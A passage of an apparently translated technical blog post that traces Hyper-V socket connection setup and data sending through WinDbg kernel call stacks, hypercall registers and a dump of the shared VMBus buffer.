<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffa48ea28888f0)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx UNICODE_STRING @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((UNICODE_STRING *)0xffffa48ea2888900)) : "{b1d00d3e-fe10-4570-ad62-7648779d7a1b}-{00000000-0000-0000-0000-000000000000}-0000" [Type: UNICODE_STRING]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the nt!PnpNotifyDeviceClassChange function is executed</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!PnpNotifyDeviceClassChange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!PnpDeviceEventWorker+0x263</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ExpWorkerThread+0xe9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!PspSystemThreadStartup+0x41</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 nt!KiStartSystemThread+0x16</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`9f13f3f8 cb3a4004 11d046f0 60008fb0 3f051397 .@:..F.....`...?</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dx _GUID @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0xffffa48ea0dcd0a8)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> du @rdx+10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd0b8 "\??\ACPI#VMBus#0#{b1d00d3e-fe10-"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd0f8 "4570-ad62-7648779d7a1b}\{b1d00d3"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd138 "e-fe10-4570-ad62-7648779d7a1b}-{"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd178 "00000000-0000-0000-0000-00000000"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa48e`a0dcd1b8 "0000}-0000"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ClientExample.exe stream stack at the same time:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1070 fffff800`081690d5 nt!KxDispatchInterrupt+0x122</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e11b0 fffff800`08169d32 nt!KiDpcInterruptBypass+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e11c0 fffff800`07e6a003 nt!KiVmbusInterrupt2+0x212 (TrapFrame @ ffffd180`715e11c0)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1358 fffff809`c86a17ff 0xfffff800`07e6a003</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1360 fffff809`c86a19b4 winhv!WinHvpHypercall+0x57</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e13a0 fffff809`c86a1f96 winhv!WinHvpSimplePoolHypercall+0x40</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e13e0 fffff809`c8628f92 winhv!WinHvPostMessage+0x8e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1470 fffff809`c8628664 vmbus!PncSendMessage+0x42</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e14a0 fffff809`c863c08d vmbus!XPartSendMessage+0x60</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e14f0 fffff809`c8669b24 vmbus!ChTlConnectRequest+0x4d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1530 fffff809`c8665e67 hvsocket!VmbusTlXPartChildSetupConnection+0xb4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1580 fffff809`c8662fe5 hvsocket!VmbusTlSetupConnection+0x18b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e15d0 fffff809`c98970e2 hvsocket!VmbusTlProviderConnect+0x615</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1680 fffff800`0842e180 afd!AfdConnect+0x6b2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1820 fffff800`0842d064 nt!IopSynchronousServiceTail+0x1a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e18e0 fffff800`0842c9e6 nt!IopXxxControlFile+0x674</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1a20 fffff800`08170493 nt!NtDeviceIoControlFile+0x56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ffffd180`715e1a90 00000000`61e7222c nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ ffffd180`715e1b00)</span></div>
<br /><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;"><ol start="6" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -36pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Send</span></div>
</li>
</ol>
</ol>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The most functional part - data reception and transmission. Let's consider </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">send</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Recv</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, I think, essentially should not differ. Will consider the client application. In usermode mswsock!WPSend is caused to ntdll!NtDeviceIoControlFile</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00DBF45C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1201F</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBF44C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However in the standard handler of afd!AfdDispatchDeviceControl we will not get, instead processing of this code will be carried out by afd! AfdFastIoDeviceControl. At initialization of the driver the corresponding handler is registered:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">objDrv-> FastIoDispatch = &AfdFastIoDispatch</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvSignalEvent</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!BusChSendInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclSendSignal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlConnectProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wow64cpu!CpupSyscallStub</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wow64cpu!DeviceIoctlFileFaul</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvpHypercallRoutine has following parameters:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=000000000001005d – hypercall code</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=000000000001000a – CONNECTION_ID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8 = 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In a research of process of data transmission the Hyper-V Data Exchange component (</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2015/10/hyper-v-internals.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, the section Integration Services - Data Exchange) in case of data transmission via the general buffer, a signal for its reading is WinHvSignalEvent call. The general buffer for transfer was allocated earlier and represents area of the memory available to reading\writing to both guest OS, and root OS. To see this area it is necessary to put the breakpoint to vmbusr!PkGetReceiveBuffer and to see the buffer pointer of which is located in rcx+18h. The size of the buffer rather big - in 2012 r2 for it was allocated 10 physical pages, these are 40 KB.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc ffffbf01`7c9a9000 L1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9a9000 00000028 00000000 00000001 00000000 (...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9a9010 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa000 00020006 00000004 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa010 00000001 00000008 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">74736554 74736554 ........TestTest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa020 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
